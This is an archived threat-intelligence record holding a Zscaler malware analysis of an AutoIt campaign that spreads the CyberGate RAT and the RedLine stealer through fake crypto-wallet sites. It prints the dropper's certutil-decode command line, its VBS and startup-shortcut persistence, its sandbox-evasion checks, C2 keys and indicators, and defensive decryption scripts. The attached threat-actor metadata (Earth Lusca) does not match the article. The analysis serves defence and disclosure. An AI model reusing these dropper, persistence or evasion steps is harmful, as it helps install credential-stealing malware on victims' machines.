{ "id": "52f75fc9-f531-4c62-84d0-6247149762f8", "created_at": "2026-04-06T00:06:36.935609Z", "updated_at": "2026-04-10T03:36:48.143392Z", "deleted_at": null, "sha1_hash": "4e194b7de45fea5a44ab8e9980d747ebad9e2b02", "title": "CyberGate, RedLine Part of AutoIt Malware Campaign| Zscaler", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4137862, "plain_text": "CyberGate, RedLine Part of AutoIt Malware Campaign| Zscaler\r\nBy Mohd Sadique\r\nPublished: 2020-07-02 · Archived: 2026-04-05 18:59:54 UTC\r\nIn our most recent blog, we had detailed a malware campaign that uses a malicious document (DOC) file to\r\ndeliver an AutoIt script which, in turn, delivers the Taurus stealer to steal credentials, cookies, history, system info,\r\nand more. Along similar lines, we recently came across a new malware campaign that uses a similar AutoIt script\r\nto deliver a new variant of the CyberGate RAT and RedLine stealer.\r\nThis blog will walk you through a detailed analysis of the payload delivery mechanism, capabilities, and\r\nCommand and Control (C\u0026C) communication. We also observed the usage of custom C\u0026C protocols to exfiltrate\r\nsensitive information. We will shed light on the custom protocol used by the Cybergate RAT.\r\nBelow is the detection timeline for AutoIt malware campaigns in the past month. We observed several hits for the\r\nAutoIt malware involving various malware families, including AZOrult, Xtreme RAT, Taurus stealer, RedLine\r\nStealer, and CyberGate RAT. The Zscaler ThreatLabZ team is closely monitoring the developments on these\r\ncampaigns to ensure coverage.\r\nFigure 1: Hits of AutoIt-based malware in the past month.\r\nZscaler Cloud Sandbox captured the CyberGate RAT and RedLine stealer successfully. We observed that both of\r\nthem are packed with the same packer and use the same payload delivery mechanism. The tactics, techniques, and\r\nprocedures (TTPs) observed in these two campaigns are similar in nature, so we suspect that the same actors are\r\nbehind these attacks.\r\nPayload delivery mechanism\r\nAs observed in a previous blog, the source of the stealer was spam mail containing a link to download the\r\nmalware or an attached DOC file that downloads the malware. While tracking this campaign, we found that this\r\nmalware is served by phishing sites. At the time of our analysis, we found a live phishing site of a cryptocurrency\r\nblockchain exchange called Resistance, which is serving the RedLine stealer.\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 1 of 17\n\nFigure 2: A crypto blockchain exchange phishing site.\r\nWrapper analysis\r\nThe files downloaded from these phishing sites are self-extracting archives (SFX), which contain a cabinet file\r\nand a script to execute embedded files. The cabinet file can be found under the RCData resource directory with the\r\nname ‘CABINET’ and command for execution in the resource directory of the name ‘RUNPROGRAM’.\r\nFigure 3: The resource directory of the wrapper file.\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 2 of 17\n\nThe cabinet file contains three files with a ‘com’ extension and the file names are random and different in other\r\nAutoIt scripts. Those files are:\r\nffXi.com - This is a legit Autoit3.exe having an invalid header used to run AutoIt scripts\r\nadCt.com - A Windows Base64 encoded AutoIt script by certutil\r\nbzYfp.com - The encrypted payload\r\nThe command-line script present in the ‘RUNPROGRAM’ resource directory to execute embedded files is shown\r\nbelow:\r\ncmd /c lsass.com \u0026 type ffXi.com \u003e\u003e lsass.com \u0026 del ffXi.com \u0026 certutil -decode adCt.com R \u0026 lsass.com R \u0026\r\nping 127.0.0.1 -n 20\r\nFirst, it corrects the header of ‘ffXi.com’ (Autoit3.exe) by appending “M”, stores it in ‘lsass.com’, then it deletes\r\n‘ffXi.com’. After that, it decodes the Base64 encoded AutoIt script using ‘certutil’ with the parameter “-decode”,\r\nsaves it to a file “R”, and then runs this AutoIt script with Autoit3.exe (lsass.com). In the end, it uses the ping\r\ncommand as a sleep timer. \r\nThe AutoIt script uses custom obfuscation and all the hardcoded strings are encrypted in the malware, as we have\r\nseen previously in this campaign. Upon execution, the AutoIt script drops and hides the following four files in the\r\ndirectory “%APPDATA%\\\\cghost” for achieving persistency on the system. We found this persistency technique\r\nin the AutoIt script only if the final payload is RAT.\r\ncghost.com - Copy of AutoIt interpreter\r\naGuDP - Copy of Autoit script\r\nbzYfp.com - Copy of encrypted payload\r\ndLzSj.vbs - VBS script to execute AutoIt interpreter with the script\r\nThe VBS file contains:\r\nCGXdBksrYqQnDIwn =\r\nGetObject(\"winmgmts:\\\\.\\root\\cimv2:Win32_Process\").Create(\"%appdata%\\cghost\\cghost.com\r\n%appdata%\\cghost\\aGuDP\" , \"%appdata%\\cghost\", Null, OJxMEkRRELvrj )\r\nFor persistence, it creates an internet shortcut file ‘cghost.url’ in the startup directory with the following contents:\r\n[InternetShortcut]\r\nURL=\"%APPDATA%\\cghost\\dLzSj.vbs\"\r\nThe AutoIt script has multiple sandbox evasion tricks to avoid detection. It also checks to see if a file\r\nand computer name exists in the system and checks for a particular domain.\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 3 of 17\n\nFigure 4: The malware performs multiple checks before execution.\r\nThis malware wrapper avoids its execution in the Windows defender antivirus simulator by checking for the\r\npresence of the “C:\\aaa_TouchMeNot.txt” file in the system. The malware terminates execution if it finds the\r\nfollowing computer names, which are used by AV emulators:  \r\n“NfZtFbPfH” - Kaspersky\r\n“tz” - Bitdefender\r\n“ELICZ” - AVG\r\n“MAIN\" - VBA\r\n“DESKTOP-QO5QU33” - Assuming this is the attacker’s machine name\r\nIt checks for the sleep API patch with 'GetTickCount' to detect the sandbox emulation. It also checks for the\r\ndomain ‘OJtmGmql.OJtmGmql’, it will exit if the domain is alive. These are random strings and found to be\r\ndifferent in every other wrapper. If it passes all the above checks then it injects the shellcode for the 'RC4'\r\nalgorithm based on the system architecture into the specified running process or the current process memory.\r\nFigure 5: The RC4 algorithm shellcode.\r\nThe RC4 key is XOR-encrypted in the AutoIt script which can be found in a function calling along with the\r\nencrypted data and process path for injection.\r\nFigure 6: The encrypted RC4 key.\r\nThis RC4 key is found to be different in every case. The AutoIt script reads the encrypted payload (bzYfp.com)\r\nand decrypts it using the RC4 shellcode with the hardcoded key “537180” (in this case).\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 4 of 17\n\nFigure 7: The RC4 algorithm in the first shellcode.\r\nAfter that, it injects another shellcode in the memory, which creates a mutex first with the name of\r\n‘JFTZRATSJPATTZLFCUTTH’, then it takes the decrypted PE file, injects it into the process, and executes it.\r\nThe final payload is decrypted and executed in the memory only so it will not get captured by the antivirus if\r\nit has static detection.\r\nWe have written a python script to decrypt the encrypted payload, which can be found in Appendix I.\r\nThe payloads dropped by this wrapper are CyberGate RAT or RedLine stealer.\r\nCyberGate RAT\r\nThe CyberGate RAT from this campaign looks like a new variant that we have not seen in the past. CyberGate\r\nallows an attacker to browse and manipulate files, devices, and settings on the victim's machine as well as\r\ndownload and execute additional malware. It also has a wide range of information stealing abilities, such as\r\nkeyloggers, screen capture, and remote enabling of webcams.\r\nThe capabilities of the CyberGate RAT that we found in this variant include:\r\nCollecting the system info\r\nCreating a specified directory\r\nDownloading and executes additional files\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 5 of 17\n\nGetting the content of a specified file\r\nStealing the browser’s credentials\r\nCapturing the screen\r\nRunning a keylogger\r\nThe C\u0026C address and port information are encrypted and hardcoded in the binary. Encryption is simple XOR with\r\nthe hardcoded key “2qYNYM2Z74XL”.\r\nFigure 8: The XOR decryption of the encrypted IP address.\r\nThe unique bot ID is created by adding the username, computer name, and the serial number of the victim\r\nmachine and calculating the MD5 hash.\r\nBot ID = MD5(UserName+ComputerName+SerialNumber)\r\nFigure 9: Bot ID creation.\r\nNetwork traffic analysis\r\nThis variant of CyberGate RAT has a hardcoded and encrypted C\u0026C IP address and it uses a 3970 port to\r\ncommunicate on the TCP protocol. The complete traffic is compressed with zlib compression and encrypted with\r\nRC4 with the hardcoded key present in the binary.\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 6 of 17\n\nFigure 10: CyberGate network traffic.\r\nFigure 11: Packet structure.\r\nClient and server packets are encrypted or decrypted by RC4 with the same hardcoded key “draZwyK8wNHF”,\r\nwhich is present in the binary. After the decryption of server packets, the data starts with the marker of 14 bytes\r\n“@@XXXXXXXXXX@@” and followed by the zlib compressed data. We have seen this marker in the previous\r\nversion of Cybergate RAT.\r\nFigure 12: The decrypted packet data.\r\nAfter decompression, the data starts with the command followed by the parameters and separated by the marker\r\n“##$##”.\r\nStructure: ##$####$##\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 7 of 17\n\nFigure 13: The decrypted communication between the client and the C\u0026C server.\r\nIn the first request, the command will send the calculated unique bot ID to the server.\r\nThe second command will search for the stored credentials in the Chrome and Firefox browser profiles. If it\r\nmatches the parameters, then it sends the credentials to the server along with the machine info, including socket\r\nname, user name, computer name, product name, and bot ID.\r\nFigure 14: The credentials and machine info that is sent to the server.\r\nThe command “Ky8pr22KrbW3” or “neAWM9TC4tsk” creates the specified directory in the %appdata%. It then\r\ndownloads and stores the specified file inside and executes it.\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 8 of 17\n\nFigure 15: The command to download and execute additional malware.\r\nWe have found the following commands in this variant of the CyberGate RAT.\r\nCommands Descriptions     \r\n4hybWKLmEShM Send the unique bot ID to the server\r\nECDnG66CYsZc Steal the browser’s credentials and machine info\r\ndYh3GKy2DK Store data to the registry\r\nKy8pr22KrbW3 Download and execute additional malware\r\nneAWM9TC4tsk Download and execute additional malware and exit itself\r\nEffNaMNRW43T Capture the screen\r\n5Qvape9Wv6eA Start the keylogger\r\nWe have written a python script to decrypt the CyberGate RAT and C\u0026C traffic. It can be found in Appendix II.\r\nRedLine stealer\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 9 of 17\n\nThe final payload is the .NET binary file of RedLine stealer. This stealer is available for sale on Russian forums\r\nand was seen before in a COVID-themed email campaign. Proofpoint published a blog about that campaign.\r\nThe capabilities of this stealer include:\r\nCollecting information about the victim’s system\r\nCollecting credentials, cookies, credit cards from Chromium- and Gecko-based browsers\r\nCollecting data from FTP clients (FileZilla, WinSCP)\r\nCollecting data from IM clients (Pidgin)\r\nCollecting cryptocurrency wallets\r\nDownloading and executing the specified file\r\nFigure 16: The RedLine stealer classes and C\u0026C domain.\r\nThe RedLine stealer uses SOAP over HTTP protocol for its C\u0026C communication.\r\nAfter getting connected with the C\u0026C server, RedLine fetches the client configuration settings from the server.\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 10 of 17\n\nFigure 17: Fetching the client configuration settings.\r\nThis client configuration settings include GrabBrowsers, GrabFTP, GrabFiles, GrabImClients, GrabPaths,\r\nGrabUserAgent, and GrabWallets.\r\nFigure 18: The RedLine client configuration settings.\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 11 of 17\n\nAfter collecting the data as per the configuration, it sends all the data back to the server.\r\nFigure 19: Sending the stolen data to server.\r\nAfter that, it sends the request to the server to get the task to download a file, execute a file, access a link, or inject\r\na file to a process along with the victim’s machine info, such as IP, location, OS, and more.\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 12 of 17\n\nFigure 20: Sending the request to the server to get a task.\r\nCoverage\r\nThe observed indicators in this attack were successfully blocked by the Zscaler Cloud Sandbox.\r\nFigure 21: The Zscaler Cloud Sandbox report for the CyberGate RAT.\r\nFigure 22: The Zscaler Cloud Sandbox report for the RedLine stealer.\r\nIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various\r\nlevels.\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 13 of 17\n\nThe following is the advanced threat protection signatures released for detecting the malware:\r\nWin32.Backdoor.CyberGate\r\nWin32.Backdoor.RedLine\r\nWin32.PWS.AutoIT\r\nAnd the following are the Cloud IPS (non-web) signatures that enable detection of the CyberGate RAT:\r\nWin32.Backdoor.CyberGate\r\nConclusion\r\nWe are observing an increase in the usage of AutoIt script as a wrapper to deliver malware by threat actors.\r\nThis trend appears to be getting stronger with a lot of obfuscation, anti-analysis and anti-sandbox tricks, and\r\nfileless techniques being adopted by the AutoIt-based malware. The final payloads we have seen in these\r\ncampaigns are RATs and Infostealers, which are capable of stealing sensitive information and installing additional\r\nmalware. Also, the usage of a custom protocol for the exfiltration of sensitive information poses a great challenge\r\nfor network security solutions to block the data exfiltration attempt.\r\nThe Zscaler ThreatLabZ team will continue to monitor AutoIT-based malware campaigns to share the information\r\nwith the community and to keep our customers safe.\r\nMITRE ATT\u0026CK™ tactic and technique mapping\r\nTactic                Technique\r\nT1059                Execution through Command-Line interface\r\nT1060                Persistence in startup directory\r\nT1055                Process injection\r\nT1140                Obfuscated files\r\nT1503                Steal credentials from web browsers\r\nT1056                Keylogging\r\nT1539                Steal web session cookies\r\nT1083                File and Directory Discovery\r\nT1057                Process Discovery\r\nT1012                Query Registry\r\nT1082                System Information Discovery\r\nT1497                Sandbox Evasion\r\nT1005                Collect Data from Local System\r\nT1113                Captures Screen\r\nT1094                Custom C\u0026C Protocol\r\nT1132                Base64 Data Encoding\r\nT1065                Uncommonly Used Port\r\nT1002                Data Compressed\r\nT1020                Data Exfiltration\r\nT1022                Data Encrypted\r\nIOCs\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 14 of 17\n\nCybergate RAT\r\n37.252.5[.]213/55.exe (Download URL)\r\n37.252.5[.]213[:]3970 (Cybergate C\u0026C)\r\n433dd4dce13e86688a3af13686c84d1c Packed file\r\n608D98351812A3C2C73B94A6F5BEF048 Encoded autoit file\r\n340F2664D7956A753D8EA2FA5C0044FF Encrypted payload\r\n53A116D2B8AB11B92B293B4AD18CC523 Decoded autoit script\r\n391317CC132C65561811316324171F8C Shellcode 1\r\n63CFBCE717C7761B6802E3C1B1F8ACCF Shellcode 2\r\n88A81C67556D4470F23F703D64606E16 Cybergate RAT\r\nRedLine Stealer\r\nresisproject[.]me (Phishing site)\r\nbbuseruploads[.]s3[.]amazonaws[.]com/583b9547-e88c-4247-a01e-655ff985a7ae/downloads/5a2556c5-ec0f-4699-b67c-40b9f2a43fc7/Resistance_Wallet-windows-2.2.9.zip (Download URL)\r\nresisproject[.]cc (Phishing site)\r\nbitbucket[.]org/kapow37047/win64/downloads/ResistanceWallet_2.2.8.exe (Download URL)\r\nyellowbag[.]top (RedLine C\u0026C)\r\n70EFF6AE73C0E276D385929D9E253D02 Packed file\r\nC96BF5CECA92A5362F342A7EE19FDC88 Encoded autoit file\r\nF1AA91851E0F66AAC3F65E4C237E8B51 Encrypted payload\r\n106FCC5A6B51E4B2213694C7B5FF3C08 Decoded autoit script\r\n729BB625379513FC677606888941248B RedLine Stealer\r\n4B0F5B53264C56125BD5C889E063BBCA Packed file\r\n67E67250B0DB02F824804EC17A757B1E Encoded autoit file\r\n67BB52ECFE627A96076AFAFD2DDE32C7 Encrypted payload\r\n293918878C0CE8CFFBD344B16EAC656E Decoded autoit script\r\n9E286AB918E5FACF45B2AE0195CEF54B RedLine Stealer\r\nAppendix I\r\nPython Script to decrypt encrypted Cybergate payload and RedLine payload:\r\nimport sys\r\nfrom Crypto.Cipher import ARC4\r\n#RC4 keys\r\nkeys = ['537180', '7010', ‘2379’]\r\nenc_file = sys.argv[1]\r\ndec_file = sys.argv[2]\r\nfor key in keys:\r\n    cipher = ARC4.new(key)\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 15 of 17\n\ndata = open(enc_file, 'rb').read()\r\n    out = cipher.decrypt(data)\r\n    if out[:2] == \"MZ\":\r\n        with open(dec_file, 'wb') as wf:\r\n            wf.write(out)\r\n        print(\"[+] Decrypted PE file - \" + dec_file)\r\n        break\r\nAppendix II\r\nPython Script to decrypt \u0026 decompress Cybergate traffic:\r\nimport zlib\r\nfrom Crypto.Cipher import ARC4\r\ndef dec_packet(packet):\r\n    result = \"\"\r\n    marker = \"##$##\"\r\n    #packet = str(bytearray.fromhex(packet))\r\n         if len(packet) == 2:\r\n        return result\r\n    try:\r\n        if packet.startswith(\"\\x0d\\x0a\"):\r\n            packet = packet[2:]\r\n        packet = packet.split(marker)[1]\r\n        if packet.startswith(\"\\x0d\\x0a\"):\r\n            packet = packet[2:]\r\n    except:\r\n        pass\r\n    try:\r\n        key = b'draZwyK8wNHF'\r\n        cipher = ARC4.new(key)\r\n        rc4_out = cipher.decrypt(packet)\r\n        if rc4_out.startswith(\"@@XXXXXXXXXX@@\"):\r\n            rc4_out = rc4_out[14:]\r\n            result = zlib.decompress(rc4_out)\r\n            return result\r\n    except:\r\n        return result\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 16 of 17\n\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns" ], "report_names": [ "cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775433996, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4e194b7de45fea5a44ab8e9980d747ebad9e2b02.pdf", "text": "https://archive.orkl.eu/4e194b7de45fea5a44ab8e9980d747ebad9e2b02.txt", "img": "https://archive.orkl.eu/4e194b7de45fea5a44ab8e9980d747ebad9e2b02.jpg" } }